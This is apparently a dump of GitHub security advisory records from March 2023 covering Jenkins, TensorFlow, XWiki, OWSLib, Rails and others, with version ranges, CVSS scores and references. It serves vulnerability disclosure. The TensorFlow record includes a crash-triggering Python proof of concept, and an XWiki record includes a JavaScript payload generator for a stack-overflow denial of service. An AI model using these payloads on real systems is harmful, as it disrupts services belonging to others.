Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and prior to LTS 2.387.1 is affected by the Apache Commons FileUpload library’s vulnerability CVE-2023-24998. This library is used to process uploaded files via the Stapler web framework (usually through StaplerRequest#getFile) and MultipartFormDataParser in Jenkins. This allows attackers to cause a denial of service (DoS) by sending crafted requests to HTTP endpoints processing file uploads. Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 limits the number of request parts to be processed to 1000. Specific endpoints receiving only simple form submissions have a lower limit.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27900'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27900.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-3030'}]
{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:42Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
1.4.0
GHSA-8h9c-r582-mggc
2023-03-20T14:00:04Z
2023-03-07T20:41:36Z
null
['CVE-2023-27476']
OWSLib vulnerable to XML External Entity (XXE) Injection
### Impact OWSLib's XML parser (which supports both `lxml` and `xml.etree`) does not disable entity resolution for `lxml`, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase. ### Patches - Use only lxml for XML handling, adding `resolve_entities=False` to `lxml`'s parser: https://github.com/geopython/OWSLib/pull/863 ### Workarounds ```python patch_well_known_namespaces(etree) etree.set_default_parser( parser=etree.XMLParser(resolve_entities=False) ) ``` ### References - [`GHSL-2022-131`](https://securitylab.github.com/advisories/GHSL-2022-131_OWSLib/)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'OWSLib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.28.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/security/advisories/GHSA-8h9c-r582-mggc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27476'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/pull/863'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/pull/863/commits/b92687702be9576c0681bb11cad21eb631b9122f'}, {'type': 'PACKAGE', 'url': 'https://github.com/geopython/OWSLib'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/releases/tag/0.28.1'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/owslib/PYSEC-2023-86.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/06/msg00032.html'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2022-131_owslib/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5426'}]
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:41:36Z', 'nvd_published_at': '2023-03-08T00:15:00Z'}
1.4.0
GHSA-g8xm-p2h4-v6jp
2023-04-04T15:24:49Z
2023-03-24T21:30:48Z
null
['CVE-2021-3684']
OpenShift Assisted Installer leaks image pull secrets as plaintext in installation logs
A vulnerability was found in OpenShift Assisted Installer. During generation of the Discovery ISO, image pull secrets were leaked as plaintext in the installation logs. An authenticated user could exploit this by re-using the image pull secret to pull container images from the registry as the associated user.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/assisted-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.25.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3684'}, {'type': 'WEB', 'url': 'https://github.com/openshift/assisted-installer/commit/2403dad3795406f2c5d923af0894e07bc8b0bdc4'}, {'type': 'WEB', 'url': 'https://github.com/openshift/assisted-installer/commit/f3800cfa3d64ce6dcd6f7b73f0578bb99bfdaf7a'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1985962'}, {'type': 'PACKAGE', 'url': 'https://github.com/openshift/assisted-installer'}]
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:59:18Z', 'nvd_published_at': '2023-03-24T20:15:00Z'}
1.4.0
GHSA-49rq-hwc3-x77w
2023-03-30T22:17:27Z
2023-03-24T21:55:32Z
null
['CVE-2023-25670']
TensorFlow has Null Pointer Error in QuantizedMatMulWithBiasAndDequantize
### Impact NPE in QuantizedMatMulWithBiasAndDequantize with MKL enable ```python import tensorflow as tf func = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize para={'a': tf.constant(138, dtype=tf.quint8), 'b': tf.constant(4, dtype=tf.qint8), 'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]], 'min_a': 141.5337138686371, 'max_a': [73.84139251708984, 173.15280151367188], 'min_b': [], 'max_b': [[16.128345489501953, 193.26820373535156]], 'min_freezed_output': [], 'max_freezed_output': [115.50032806396484, 156.974853515625], 'Toutput': 1.0, 'transpose_a': True, 'transpose_b': False, 'input_quant_mode': 'MIN_FIRST'} func(**para) ``` ### Patches We have patched the issue in GitHub commit [8a47a39d9697969206d23a523c977238717e8727](https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rq-hwc3-x77w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25670'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:55:32Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-6w5f-5wgr-qjg5
2023-03-09T20:21:36Z
2023-03-09T20:21:36Z
null
[]
Constellation allows Emergency shell access during initramfs boot phase
### Impact An active attacker could let the boot fail on purpose in the initramfs, dropping the serial console into an emergency shell. This gives attackers with access to the serial console full control over the VM. ### Patches The issue has been patched in [v2.6.0](https://github.com/edgelesssys/constellation/releases/tag/v2.6.0). ### Workarounds none
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgelesssys/constellation/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/security/advisories/GHSA-6w5f-5wgr-qjg5'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgelesssys/constellation'}, {'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/releases/tag/v2.6.0'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-09T20:21:36Z', 'nvd_published_at': None}
1.4.0
GHSA-273w-7fxj-pcp6
2023-03-13T15:35:50Z
2023-03-06T21:30:18Z
null
['CVE-2021-36395']
Moodle vulnerable to Uncontrolled Resource Consumption
In Moodle, the file repository's URL parsing required additional recursion handling to mitigate the risk of recursion denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36395'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424801'}]
{'cwe_ids': ['CWE-400', 'CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:57:09Z', 'nvd_published_at': '2023-03-06T21:15:00Z'}
1.4.0
GHSA-pj73-v5mw-pm9j
2023-03-15T21:36:01Z
2023-03-15T21:36:01Z
null
['CVE-2023-28120']
Possible XSS Security Vulnerability in SafeBuffer#bytesplice
There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input. This vulnerability has been assigned the CVE identifier CVE-2023-28120. Versions Affected: All. Not affected: None Fixed Versions: 7.0.4.3, 6.1.7.3 # Impact ActiveSupport uses the SafeBuffer string subclass to tag strings as html_safe after they have been sanitized. When these strings are mutated, the tag is should be removed to mark them as no longer being html_safe. Ruby 3.2 introduced a new bytesplice method which ActiveSupport did not yet understand to be a mutation. Users on older versions of Ruby are likely unaffected. All users running an affected release and using bytesplice should either upgrade or use one of the workarounds immediately. # Workarounds Avoid calling bytesplice on a SafeBuffer (html_safe) string with untrusted user input.
[]
[{'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28120'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-28120-possible-xss-security-vulnerability-in-safebuffer-bytesplice/82469'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2023-28120.yml'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-15T21:36:01Z', 'nvd_published_at': None}
1.4.0
GHSA-86jq-pwgx-6vrq
2023-03-23T18:20:49Z
2023-03-17T12:30:40Z
null
['CVE-2023-1463']
Improper Authorization in nilsteampassnet/teampass
Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0.23'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1463'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/TeamPass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6'}]
{'cwe_ids': ['CWE-285', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T18:23:40Z', 'nvd_published_at': '2023-03-17T12:15:00Z'}
1.4.0
GHSA-5cf8-vrr8-8hjm
2023-03-03T22:47:49Z
2023-03-03T22:47:49Z
null
['CVE-2023-26476']
XWiki Platform packages Expose Sensitive Information to an Unauthorized Actor
### Impact Users can deduce the content of the password fields by repeated call to `LiveTableResults` and `WikisLiveTableResultsMacros`. ### Patches The issue is applied on versions 14.7-rc-1, 13.4.4, and 13.10.9. ### Workarounds The issue can be fixed by upgrading to versions 14.7-rc-1, 13.4.4, and 13.10.9 and higher, or in version >= 3.2M3 by applying the patch manually on `LiveTableResults` and `WikisLiveTableResultsMacros`. ### References - Jira: https://jira.xwiki.org/browse/XWIKI-19949 - Patch: https://github.com/xwiki/xwiki-platform/commit/7f8825537c9523ccb5051abd78014d156f9791c8 ### For more information If you have any questions or comments about this advisory: - Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) - Email us at [Security Mailing List](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-m3'}, {'fixed': '13.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-m3'}, {'fixed': '13.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.5.0'}, {'fixed': '13.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.5.0'}, {'fixed': '13.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.7-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.7-rc-1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5cf8-vrr8-8hjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26476'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/7f8825537c9523ccb5051abd78014d156f9791c8'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19949'}]
{'cwe_ids': ['CWE-200', 'CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:47:49Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
1.4.0
GHSA-3xmp-jwrr-8f4r
2023-05-24T15:21:40Z
2023-03-14T03:30:18Z
null
['CVE-2023-24279']
ONOS vulnerable to reflected cross-site scripting
A cross-site scripting (XSS) vulnerability in Open Network Operating System (ONOS) from version v1.9.0 to v2.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter of the API documentation dashboard under info > contact > URL.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.onosproject:onos-archetypes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'last_affected': '2.7.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24279'}, {'type': 'PACKAGE', 'url': 'https://github.com/opennetworkinglab/onos'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-24279'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-24279/index.html'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=1mSXzzwcGMM'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T15:21:40Z', 'nvd_published_at': '2023-03-14T01:15:00Z'}
1.4.0
GHSA-wxwq-525w-hcqx
2023-03-03T23:05:28Z
2023-03-03T23:05:28Z
null
[]
Yapscan Denial of Service vulnerability in report server
### Impact If you use the report server, it may be vulnerable to a Denial of Service attack. ### Patches Has been patched in v0.19.2. ### References The vulnerability was inherited by the following upstream vulnerabilites - [golang.org/x/text < v0.3.7](https://github.com/advisories/GHSA-ppp9-7jff-5vj2) - [golang.org/x/net < 0.0.0-20220906165146-f3363e06e74c](https://github.com/advisories/GHSA-69cg-p879-7622)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/fkie-cad/yapscan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.19.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/security/advisories/GHSA-wxwq-525w-hcqx'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/pull/46'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/commit/242b4b25b107deacddd4ca276b45d23e16bb3b88'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/commit/65f277662c6475eb3f592e0e4fdfee902ecd9326'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-69cg-p879-7622'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-ppp9-7jff-5vj2'}, {'type': 'PACKAGE', 'url': 'https://github.com/fkie-cad/yapscan'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/releases/tag/v0.19.2'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:05:28Z', 'nvd_published_at': None}
1.4.0
GHSA-fjrv-vx9m-4jpj
2023-04-05T20:19:51Z
2023-03-28T21:30:20Z
null
['CVE-2023-25722']
Veracode Scan Jenkins Plugin vulnerable to information disclosure
Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs, invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access of the Jenkins remote) to discover Veracode API credentials by listing the process and its arguments.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.veracode.jenkins:veracode-scan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.3.19.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25722'}, {'type': 'WEB', 'url': 'https://community.veracode.com/s/global-search/CVE-2023-25722'}, {'type': 'WEB', 'url': 'https://docs.veracode.com/updates/r/c_all_int#veracode-jenkins-plugin-233190'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/veracode-scan-plugin'}, {'type': 'WEB', 'url': 'https://veracode.com'}]
{'cwe_ids': ['CWE-214'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-05T20:19:51Z', 'nvd_published_at': '2023-03-28T20:15:00Z'}
1.4.0
GHSA-3hvj-3cg9-v242
2023-03-13T19:18:39Z
2023-03-02T23:04:10Z
null
['CVE-2023-26052']
Saleor Unauthenticated Information Disclosure Vulnerability via Python Exceptions
### Impact Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like infrastructure details in unauthenticated requests. Affected versions: Saleor ≥ 2.0.0 ### Workarounds None ### For more information If you have any questions or comments about this advisory: * Open a discussion at https://github.com/saleor/saleor/discussions * Email us at [hello@saleor.io](mailto:hello@saleor.io)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '3.1.48'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.14'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.27'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.30'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.59'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/saleor/saleor/security/advisories/GHSA-3hvj-3cg9-v242'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26052'}, {'type': 'PACKAGE', 'url': 'https://github.com/saleor/saleor'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.1.48'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.10.14'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.11.12'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.7.59'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.8.30'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.9.27'}]
{'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:04:10Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
1.4.0
GHSA-hfxp-j95j-cwrp
2023-03-13T15:25:39Z
2023-03-06T18:30:22Z
null
['CVE-2023-1197']
uvdesk/community-skeleton vulnerable to Stored Cross-site Scripting
Cross-site Scripting (XSS) - Stored in GitHub repository uvdesk/community-skeleton prior to 1.1.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'uvdesk/community-skeleton'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1197'}, {'type': 'WEB', 'url': 'https://github.com/uvdesk/community-skeleton/commit/6fae9442361c8a216611d3622bec26249a8c48a0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/97d226ea-2cd8-4f4d-9360-aa46c37fdd26'}, {'type': 'PACKAGE', 'url': 'uvdesk/community-skeleton'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:56:10Z', 'nvd_published_at': '2023-03-06T16:15:00Z'}
1.4.0
GHSA-52vf-hvv3-98h7
2023-03-03T22:53:35Z
2023-03-03T22:53:35Z
null
['CVE-2023-26479']
xwiki vulnerable to Improper Handling of Exceptional Conditions
### Impact Users with write rights can insert well-formed content that is not handled well by the parser. For instance, with `xwiki/2.1`, inserting a deeply nested group blocks (`((( ((( ((( ((( .... ))) ))) ))) )))` (see the generator below to produce a large payload) can lead to the parser throwing a `StackOverflowError`. As a consequence, some pages becomes unusable, including: - the user index (if the page containing the faulty content is a user page) - the page index Note that on the page, the normal UI is completely missing and it is not possible to open the editor directly to revert the change as the stack overflow is already triggered while getting the title of the document. This means that it is quite difficult to remove this content once inserted. ### Patches This has been patched on XWiki 13.10.10, 14.4.6, and 14.9-rc-1. ### Workarounds A temporary solution to avoid Stack Overflow errors is to increase the memory allocated to the stack by using the `-Xss` JVM parameter (e.g., `-Xss32m`). This should allow the parser to pass and to fix the faulty content. Note that we did not evaluated the consequence on other aspects of the system (e.g., performances), and should be only be used as a temporary solution. Also, this does not prevent the issue to occur again with another content. Consequently, it is strongly advised to upgrade to a version where the issue has been patched. ### References - https://jira.xwiki.org/browse/XWIKI-19838 ### For more information If you have any questions or comments about this advisory: - Open an issue in [Jira](http://jira.xwiki.org/) - Email us at [Security ML](mailto:security@xwiki.org) ### Payload Generator The Javascript code below produces 32768 nested group blocks, around the `Hello` text. ```javascript let result = "(((\nHello\n)))"; for (let i = 0; i < 15; ++i) { result = result.replace("Hello", result); } console.log(result); ```
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9-rc-1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-52vf-hvv3-98h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26479'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e5b82cd98072464196a468b8f7fe6396dce142a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19838'}]
{'cwe_ids': ['CWE-755'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:53:35Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
1.4.0
GHSA-fcmm-54jp-7vf6
2023-03-28T18:58:12Z
2023-03-21T22:31:30Z
null
['CVE-2023-28431']
Frontier's modexp precompile is slow for even modulus
### Impact Frontier's `modexp` precompile uses `num-bigint` crate under the hood. [In the implementation](https://github.com/rust-num/num-bigint/blob/6f2b8e0fc218dbd0f49bebb8db2d1a771fe6bafa/src/biguint/power.rs#L134), the cases for modulus being even and modulus being odd are treated separately. Odd modulus uses the fast Montgomery multiplication, and even modulus uses the slow plain power algorithm. This gas cost discrepancy was not accounted for in the `modexp` precompile, leading to possible denial of service attacks. ### Patches No fixes for `num-bigint` is currently available, and thus this advisory will be first fixed in the short term by raising the gas costs for even modulus, and in the long term fixing it in `num-bigint` or switching to another modexp implementation. The short-term fix for Frontier is deployed at [PR 1017](https://github.com/paritytech/frontier/pull/1017). The recommendations are as follows: - If you anticipate malicious validators, it's recommended to issue an emergency runtime upgrade as soon as possible. - If you do not anticipate malicious validators, it's recommended to issue a normal runtime upgrade, as Substrate has builtin timeout protection when validators are building blocks. ### Workarounds None. ### References A similar issue was presented in Geth's implementation and the fix can be found [here](https://go-review.googlesource.com/c/go/+/420897).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
